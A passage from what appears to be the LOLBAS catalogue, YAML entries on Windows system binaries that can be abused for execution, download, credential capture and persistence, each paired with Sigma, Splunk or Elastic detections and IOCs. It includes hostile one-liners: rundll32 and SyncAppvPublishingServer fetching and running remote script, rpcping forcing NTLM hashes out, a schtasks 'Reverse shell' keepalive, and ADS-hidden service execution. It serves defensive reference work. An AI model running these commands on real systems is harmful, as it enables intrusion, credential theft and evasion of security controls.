    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
Full_Path:
  - Path: C:\Windows\System32\regsvr32.exe
  - Path: C:\Windows\SysWOW64\regsvr32.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml
  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
  - IOC: regsvr32.exe retrieving files from Internet
  - IOC: regsvr32.exe executing scriptlet (sct) files
  - IOC: DotNet CLR libraries loaded into regsvr32.exe
  - IOC: DotNet CLR Usage Log - regsvr32.exe.log
Resources:
  - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
  - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'

================================================
FILE: yml/OSBinaries/Replace.yml
================================================
---
Name: Replace.exe
Description: Used to replace file with another file
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A
    Description: Copy .cab file to destination
    Usecase: Copy files
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A
    Description: Download/Copy executable to specified folder
    Usecase: Download file
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\replace.exe
  - Path: C:\Windows\SysWOW64\replace.exe
Detection:
  - IOC: Replace.exe retrieving files from remote server
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml
Resources:
  - Link: https://twitter.com/elceef/status/986334113941655553
  - Link: https://twitter.com/elceef/status/986842299861782529
Acknowledgement:
  - Person: elceef
    Handle: '@elceef'

================================================
FILE: yml/OSBinaries/Reset.yml
================================================
---
Name: Reset.exe
Description: Remote Desktop Services Reset Utility
Author: Matan Bahar
Created: 2025-07-31
Commands:
  - Command: reset.exe session
    Description: Once executed, `reset.exe` will execute `rwinsta.exe` in the same folder. Thus, if `reset.exe` is copied to a folder and an arbitrary executable is renamed to `rwinsta.exe`, `reset.exe` will spawn it.
    Usecase: Execute an arbitrary executable via trusted system executable.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
      - Requires: Rename
Full_Path:
  - Path: c:\windows\system32\reset.exe
  - Path: c:\windows\syswow64\reset.exe
Detection:
  - IOC: reset.exe being executed and executing rwinsta.exe outside of its normal path of c:\windows\system32\ or c:\windows\syswow64\
Acknowledgement:
  - Person: Matan Bahar
    Handle: '@Bl4ckShad3'

================================================
FILE: yml/OSBinaries/Rpcping.yml
================================================
---
Name: Rpcping.exe
Description: Used to verify rpc connection
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
    Description: Send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
    Usecase: Capture credentials on a non-standard port
    Category: Credentials
    Privileges: User
    MitreID: T1003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM
    Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).
    Usecase: Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port
    Category: Credentials
    Privileges: User
    MitreID: T1187
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\rpcping.exe
  - Path: C:\Windows\SysWOW64\rpcping.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml
Resources:
  - Link: https://github.com/vysec/RedTips
  - Link: https://twitter.com/vysecurity/status/974806438316072960
  - Link: https://twitter.com/vysecurity/status/873181705024266241
  - Link: https://twitter.com/splinter_code/status/1421144623678988298
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
  - Person: Vincent Yiu
    Handle: '@vysecurity'
  - Person: Antonio Cocomazzi
    Handle: '@splinter_code'
  - Person: ap
    Handle: '@decoder_it'

================================================
FILE: yml/OSBinaries/Rundll32.yml
================================================
---
Name: Rundll32.exe
Description: Used by Windows to execute dll files
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: rundll32.exe {PATH},EntryPoint
    Description: First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute.
    Usecase: Execute DLL file
    Category: Execute
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: rundll32.exe {PATH_SMB:.dll},EntryPoint
    Description: Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute.
    Usecase: Execute DLL from SMB share.
    Category: Execute
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
      - Execute: Remote
  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:{REMOTEURL}")
    Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
    Usecase: Execute code from Internet
    Category: Execute
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: JScript
  - Command: rundll32 "{PATH}:ADSDLL.dll",DllMain
    Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
    Usecase: Execute code from alternate data stream
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: rundll32.exe -sta {CLSID}
    Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
    Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
    Category: Execute
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10 (and likely previous versions), Windows 11
    Tags:
      - Execute: COM
Full_Path:
  - Path: C:\Windows\System32\rundll32.exe
  - Path: C:\Windows\SysWOW64\rundll32.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml
  - IOC: Outbound Internet/network connections made from rundll32
  - IOC: Suspicious use of cmdline flags such as -sta
Resources:
  - Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
  - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
  - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
  - Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
  - Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
  - Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
  - Link: https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90
  - Link: https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
  - Person: Jimmy
    Handle: '@bohops'
  - Person: Sailay
    Handle: '@404death'
  - Person: Martin Ingesen
    Handle: '@Mrtn9'

================================================
FILE: yml/OSBinaries/Runexehelper.yml
================================================
---
Name: Runexehelper.exe
Description: Launcher process
Author: Grzegorz Tworek
Created: 2022-12-13
Commands:
  - Command: runexehelper.exe {PATH_ABSOLUTE:.exe}
    Description: 'Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.'
    Usecase: Executes arbitrary code
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
    Tags:
      - Execute: EXE
Full_Path:
  - Path: c:\windows\system32\runexehelper.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml
  - IOC: c:\windows\system32\runexehelper.exe is run
  - IOC: Existence of runexewithargs_output.txt file
Resources:
  - Link: https://twitter.com/0gtweet/status/1206692239839289344
Acknowledgement:
  - Person: Grzegorz Tworek
    Handle: '@0gtweet'

================================================
FILE: yml/OSBinaries/Runonce.yml
================================================
---
Name: Runonce.exe
Description: Executes a Run Once Task that has been configured in the registry
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: Runonce.exe /AlternateShellStartup
    Description: Executes a Run Once Task that has been configured in the registry.
    Usecase: Persistence, bypassing defensive counter measures
    Category: Execute
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
Full_Path:
  - Path: C:\Windows\System32\runonce.exe
  - Path: C:\Windows\SysWOW64\runonce.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml
  - IOC: Registry key add - HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
Resources:
  - Link: https://twitter.com/pabraeken/status/990717080805789697
  - Link: https://cmatskas.com/configure-a-runonce-task-on-windows/
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'

================================================
FILE: yml/OSBinaries/Runscripthelper.yml
================================================
---
Name: Runscripthelper.exe
Description: Execute target PowerShell script
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: runscripthelper.exe surfacecheck \\?\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder}
    Description: Execute the PowerShell script with .txt extension
    Usecase: Bypass constrained language mode and execute Powershell script
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: PowerShell
Full_Path:
  - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
  - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: Event ID 4104 - Microsoft-Windows-PowerShell/Operational
  - IOC: Event ID 400 - Windows PowerShell
Resources:
  - Link: https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
Acknowledgement:
  - Person: Matt Graeber
    Handle: '@mattifestation'

================================================
FILE: yml/OSBinaries/Sc.yml
================================================
---
Name: Sc.exe
Description: Used by Windows to manage services
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
    Description: Creates a new service and executes the file stored in the ADS.
    Usecase: Execute binary file hidden inside an alternate data stream
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: sc config {ExistingServiceName} binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start {ExistingServiceName}
    Description: Modifies an existing service and executes the file stored in the ADS.
    Usecase: Execute binary file hidden inside an alternate data stream
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Windows\System32\sc.exe
  - Path: C:\Windows\SysWOW64\sc.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml
  - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml
  - IOC: Unexpected service creation
  - IOC: Unexpected service modification
Resources:
  - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OSBinaries/Schtasks.yml
================================================
---
Name: Schtasks.exe
Description: Schedule periodic tasks
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr "{CMD}"
    Description: Create a recurring task to execute every minute.
    Usecase: Create a recurring task to keep reverse shell session(s) alive
    Category: Execute
    Privileges: User
    MitreID: T1053.005
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
  - Command: schtasks /create /s targetmachine /tn "MyTask" /tr "{CMD}" /sc daily
    Description: Create a scheduled task on a remote computer for persistence/lateral movement
    Usecase: Create a remote task to run daily relative to the time of creation
    Category: Execute
    Privileges: Administrator
    MitreID: T1053.005
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
Full_Path:
  - Path: c:\windows\system32\schtasks.exe
  - Path: c:\windows\syswow64\schtasks.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml
  - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml
  - IOC: Suspicious task creation events
Resources:
  - Link: https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/

================================================
FILE: yml/OSBinaries/Scriptrunner.yml
================================================
---
Name: Scriptrunner.exe
Description: Execute binary through proxy binary to evade defensive counter measures
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: Scriptrunner.exe -appvscript {PATH:.exe}
    Description: Executes executable
    Usecase: Execute binary through proxy binary to evade defensive counter measures
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: ScriptRunner.exe -appvscript {PATH_SMB:.cmd}
    Description: Executes cmd file from remote server
    Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: Remote
      - Execute: CMD
Full_Path:
  - Path: C:\Windows\System32\scriptrunner.exe
  - Path: C:\Windows\SysWOW64\scriptrunner.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml
  - IOC: Scriptrunner.exe should not be in use unless App-v is deployed
Resources:
  - Link: https://twitter.com/KyleHanslovan/status/914800377580503040
  - Link: https://twitter.com/NickTyrer/status/914234924655312896
  - Link: https://github.com/MoooKitty/Code-Execution
Acknowledgement:
  - Person: Nick Tyrer
    Handle: '@nicktyrer'

================================================
FILE: yml/OSBinaries/Setres.yml
================================================
---
Name: Setres.exe
Description: Configures display settings
Author: Grzegorz Tworek
Created: 2022-10-21
Commands:
  - Command: setres.exe -w 800 -h 600
    Description: Sets the resolution and then launches the 'choice' command from the working directory.
    Usecase: Executes arbitrary code
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
    Tags:
      - Execute: EXE
Full_Path:
  - Path: c:\windows\system32\setres.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml
  - IOC: Unusual location for choice.exe file
  - IOC: Process created from choice.com binary
  - IOC: Existence of choice.cmd file
Resources:
  - Link: https://twitter.com/0gtweet/status/1583356502340870144
Acknowledgement:
  - Person: Grzegorz Tworek
    Handle: '@0gtweet'

================================================
FILE: yml/OSBinaries/SettingSyncHost.yml
================================================
---
Name: SettingSyncHost.exe
Description: Host Process for Setting Synchronization
Author: Elliot Killick
Created: 2021-08-26
Commands:
  - Command: SettingSyncHost -LoadAndRunDiagScript {PATH:.exe}
    Description: Execute file specified in %COMSPEC%
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: EXE
  - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab {PATH:.bat}
    Description: Execute a batch script in the background (no window ever pops up), which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory, thereby causing them to execute instead of the ones in C:\Windows\System32.
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: CMD
Full_Path:
  - Path: C:\Windows\System32\SettingSyncHost.exe
  - Path: C:\Windows\SysWOW64\SettingSyncHost.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml
  - IOC: SettingSyncHost.exe should not be run on a normal workstation
Resources:
  - Link: https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/
Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'
  - Person: Elliot Killick
    Handle: '@elliotkillick'

================================================
FILE: yml/OSBinaries/Sftp.yml
================================================
---
Name: Sftp.exe
Description: sftp.exe is a Windows command-line utility that uses the Secure File Transfer Protocol (SFTP) to securely transfer files between a local machine and a remote server.
Author: Swachchhanda Shrawan Poudel
Created: 2025-05-13
Commands:
  - Command: sftp -o ProxyCommand="{CMD}" .
    Description: "Spawns ssh.exe which in turn spawns the specified command line. See also this project's entry for ssh.exe."
    Usecase: Proxy execution of specified command, can be used as a defensive evasion.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
Full_Path:
  - Path: C:\Windows\System32\OpenSSH\sftp.exe
Detection:
  - IOC: sftp.exe executions with ProxyCommand on the command line
  - IOC: sftp.exe spawning ssh.exe with ProxyCommand on the command line
  - Sigma: https://github.com/SigmaHQ/sigma/pull/5414/files
Resources:
  - Link: https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/
Acknowledgement:
  - Person: Swachchhanda Shrawan Poudel
    Handle: '@_swachchhanda_'

================================================
FILE: yml/OSBinaries/Sigverif.yml
================================================
---
Name: Sigverif.exe
Description: File Signature Verification utility to verify digital signatures of files
Author: Moshe Kaplan
Created: 2021-11-08
Commands:
  - Command: sigverif.exe
    Description: Launch sigverif.exe GUI, click 'Advanced', specify arbitrary executable path as 'log file name', then click 'View Log' to execute the binary.
    Usecase: Execute arbitrary programs through a trusted Microsoft-signed binary to bypass application whitelisting.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 10, Windows 11
    Tags:
      - Execute: EXE
      - Application: GUI
Full_Path:
  - Path: C:\Windows\System32\sigverif.exe
  - Path: C:\Windows\SysWOW64\sigverif.exe
Detection:
  - IOC: sigverif.exe spawning unexpected child processes
Resources:
  - Link: https://twitter.com/0gtweet/status/1457676633809330184
  - Link: https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/
Acknowledgement:
  - Person: Grzegorz Tworek
    Handle: '@0gtweet'
  - Person: Adam
    Handle: '@Hexacorn'

================================================
FILE: yml/OSBinaries/Ssh.yml
================================================
---
Name: ssh.exe
Description: Ssh.exe is the OpenSSH-compatible client that can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
Author: Akshat Pradhan
Created: 2021-11-08
Commands:
  - Command: ssh localhost "{CMD}"
    Description: Executes specified command on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.
    Usecase: Execute specified command, can be used for defense evasion.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10 1809, Windows Server 2019
    Tags:
      - Execute: CMD
  - Command: ssh -o ProxyCommand="{CMD}" .
    Description: Executes specified command from ssh.exe
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10
    Tags:
      - Execute: CMD
Full_Path:
  - Path: c:\windows\system32\OpenSSH\ssh.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml
  - IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe.
  - IOC: command line arguments specifying execution.
Resources:
  - Link: https://gtfobins.github.io/gtfobins/ssh/
Acknowledgement:
  - Person: Akshat Pradhan
  - Person: Felix Boulet

================================================
FILE: yml/OSBinaries/Stordiag.yml
================================================
---
Name: Stordiag.exe
Description: Storage diagnostic tool
Author: 'Eral4m'
Created: 2021-10-21
Commands:
  - Command: stordiag.exe
    Description: Once executed, Stordiag.exe will execute schtasks.exe, systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.
    Usecase: Possible defence evasion purposes.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10
    Tags:
      - Execute: EXE
  - Command: stordiag.exe
    Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.
    Usecase: Possible defence evasion purposes.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 11
    Tags:
      - Execute: EXE
Full_Path:
  - Path: c:\windows\system32\stordiag.exe
  - Path: c:\windows\syswow64\stordiag.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml
  - IOC: systeminfo.exe, fltmc.exe, schtasks.exe or powershell.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\
Resources:
  - Link: https://twitter.com/eral4m/status/1451112385041911809
Acknowledgement:
  - Person: Eral4m
    Handle: '@eral4m'
  - Person: Ekitji
    Handle: '@eki_erk'

================================================
FILE: yml/OSBinaries/Syncappvpublishingserver.yml
================================================
---
Name: SyncAppvPublishingServer.exe
Description: Used by App-v to get App-v server lists
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX"
    Description: Example command on how to inject Powershell code into the process
    Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
    Tags:
      - Execute: PowerShell
Full_Path:
  - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
  - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml
  - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
Resources:
  - Link: https://twitter.com/monoxgas/status/895045566090010624
Acknowledgement:
  - Person: Nick Landers
    Handle: '@monoxgas'

================================================
FILE: yml/OSBinaries/Tar.yml
================================================
---
Name: Tar.exe
Description: Used by Windows to extract and create archives.
Author: Brian Lucero
Created: 2023-01-30
Commands:
  - Command: tar -cf {PATH}:ads {PATH_ABSOLUTE:folder}
    Description: Compress one or more files to an alternate data stream (ADS).
    Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: tar -xf {PATH}:ads
    Description: Decompress a compressed file from an alternate data stream (ADS).
    Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: tar -xf {PATH_SMB:.tar}
